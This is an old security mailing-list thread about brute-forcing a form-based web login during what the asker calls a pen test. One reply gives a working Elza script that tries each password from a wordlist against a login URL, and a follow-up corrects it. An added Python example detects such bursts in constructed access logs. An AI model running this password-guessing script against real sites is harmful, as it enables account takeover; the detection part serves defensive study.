Whoops, always spot the mistakes after you send it. Dodgy coding.
The line:

    subst ACCOUNT = admin

should read as:

    subst USERSTRING = admin

Also the line:

    print Positive Authentication with Login: ACCOUNT, Password: CURRPASS

should read as:

    print Positive Authentication with Login: USERSTRING, Password: PASSSTRING

Regards

Greg

> -----Original Message-----
> From: Greg [mailto:[EMAIL PROTECTED]]
> Sent: 20 April 2002 02:05
> To: joh ket; [EMAIL PROTECTED]
> Subject: RE: Password HTML form bruteforce
>
>
> I'm afraid Brutus doesn't handle 302's correctly. Dodgy coding if
> you ask me.
>
> Why don't you try Elza
> (http://online.securityfocus.com/tools/1127) with this script
> which is based on one found in the Elza docs. Obviously change
> the target url and username. This script will read each string
> from words.txt and submit each attempt checking for the
>
> var autoredir = on
> subst ACCOUNT = admin
>
> proc POSITIVEAUTH
> print Positive Authentication with Login: ACCOUNT,
> Password: CURRPASS
> endproc POSITIVEAUTH
>
> proc ATTEMPTAUTH
> field userid = USERSTRING
> field password = PASSSTRING
> # Add any other form fields that need to be sent here
> post url http://TargetAddress/Login.cfm
> call POSITIVEAUTH if body = Some warm glowing message
> about how you're logged in now.
> endproc ATTEMPTAUTH
>
> call ATTEMPTAUTH PASSSTRING % words.txt
>
> In the above script, if you set 'autoredir' to off you will not
> be automatically redirected by the 302 and the '%location%'
> variable will be made available to you for examination. It might
> be easier to just let Elza handle the redirection and then match
> some known text in the body of the successful authentication page
> as shown above.
>
> Read the docs for Elza, you'll need to build a list of scripts up
> before it becomes really useful.
>
> cheers
>
> Greg
>
> > -----Original Message-----
> > From: joh ket [mailto:[EMAIL PROTECTED]]
> > Sent: 18 April 2002 10:16
> > To: [EMAIL PROTECTED]
> > Subject: Password HTML form bruteforce
> >
> >
> > Hi there,
> >
> > I am currently involved in a pen test on a website
> > which is using form-based authentication.
> >
> > I figured out that an account named 'test' exists...
> > (...)
> >
> > Now I want to brute force this account, I am using
> > Brutus AET2 for this.
> >
> > But I do not know how to use the HTML response.
> >
> > Below the packet capture of a response of a login
> > which was successful:
> >
> > HTTP/1.1.302.Object.Moved..Location:.start.cfm?cid=
> > (lines deleted)
> > <head><title>Document.Moved</title></head><body
> > ><h1>Object.Moved</h1>
> > This.document.may.be.found.<a.HREF="start.cfm?
> > cid=
> > (lines deleted)
> >
> > A capture of an unsuccessful login looks like this:
> >
> > HTTP/1.1.302.Object.Moved..Location:.original.cfm?
> > login=Invalid password. Please try again
> > (lines deleted)
> > Document.Moved</title></head>.<body><h1>Object.
> > Moved</h1>This.document.may.be.found.<a.HREF="
> > original.cfm?login=Invalid password. Please try
> > again">here</a>
> >
> > So depending on the password I get redirected to a
> > page...
> >
> > How should the primary and the secondary response
> > be configured?
> >
> > Or does somebody else have a better idea how to do
> > this?
> >
> > Thanks in advance!
> >
> > Joh Ket
> >
> > ----------------------------------------------------------------------------
> > This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
> > Service. For more information on SecurityFocus' SIA service which
> > automatically alerts you to the latest security vulnerabilities
> > please see:
> > https://alerts.securityfocus.com/
> > ----------------------------------------------------------------------------
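The captures in the thread also show what the site's own access log has to work with: every failed attempt is a 302 to original.cfm?login=Invalid..., so a client that follows redirects (Elza with autoredir on) requests that page right after each failed POST, while a client with autoredir off leaves only the burst of POSTs. The detector below is an added example, not from the thread or from Elza or Brutus; it counts both signals per source IP over constructed Apache-style log lines, and the log format, IP addresses, paths, threshold and window are all assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache-style combined access-log line; only the fields used below are named.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')

# Constructed sample (not from the thread). 10.0.0.5 posts to Login.cfm four times in
# four seconds; each failure is a 302 the client follows, so the redirect target shows
# up as a GET on the next line even though the Location header is never logged.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Apr/2002:02:05:01 +0000] "POST /Login.cfm HTTP/1.1" 302 189
10.0.0.5 - - [20/Apr/2002:02:05:01 +0000] "GET /original.cfm?login=Invalid%20password HTTP/1.1" 200 1532
10.0.0.5 - - [20/Apr/2002:02:05:02 +0000] "POST /Login.cfm HTTP/1.1" 302 189
10.0.0.5 - - [20/Apr/2002:02:05:02 +0000] "GET /original.cfm?login=Invalid%20password HTTP/1.1" 200 1532
10.0.0.5 - - [20/Apr/2002:02:05:03 +0000] "POST /Login.cfm HTTP/1.1" 302 189
10.0.0.5 - - [20/Apr/2002:02:05:03 +0000] "GET /original.cfm?login=Invalid%20password HTTP/1.1" 200 1532
10.0.0.5 - - [20/Apr/2002:02:05:04 +0000] "POST /Login.cfm HTTP/1.1" 302 171
10.0.0.5 - - [20/Apr/2002:02:05:04 +0000] "GET /start.cfm?cid=1234 HTTP/1.1" 200 4210
192.0.2.9 - - [20/Apr/2002:02:09:30 +0000] "POST /Login.cfm HTTP/1.1" 302 171
192.0.2.9 - - [20/Apr/2002:02:09:30 +0000] "GET /start.cfm?cid=1235 HTTP/1.1" 200 4210
"""

def login_events(log_text):
    """Per-IP (timestamp, kind): 'attempt' = 302 POST to Login.cfm, 'failure' = GET of the Invalid-password redirect."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if m["method"] == "POST" and m["path"] == "/Login.cfm" and m["status"] == "302":
            events[m["ip"]].append((ts, "attempt"))
        elif m["method"] == "GET" and m["path"].startswith("/original.cfm?login=Invalid"):
            events[m["ip"]].append((ts, "failure"))
    return events

def detect_bruteforce(log_text, threshold=3, window_seconds=60):
    """Flag IPs with >= threshold login POSTs in any sliding window; POSTs are counted so clients that never follow the 302 are still caught."""
    alerts, window = {}, timedelta(seconds=window_seconds)
    for ip, evs in login_events(log_text).items():
        attempts = sorted(t for t, k in evs if k == "attempt")
        failures = sum(1 for _, k in evs if k == "failure")
        # Peak number of attempts starting within `window` of any single attempt.
        peak = max((sum(1 for t in attempts if start <= t <= start + window)
                    for start in attempts), default=0)
        if peak >= threshold:
            alerts[ip] = {"attempts_in_window": peak, "failed_logins": failures,
                          "succeeded_after": failures < len(attempts)}
    return alerts
```

On the sample, 10.0.0.5 is flagged with four attempts, three confirmed failures and a final success, while the single login from 192.0.2.9 stays below the threshold.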
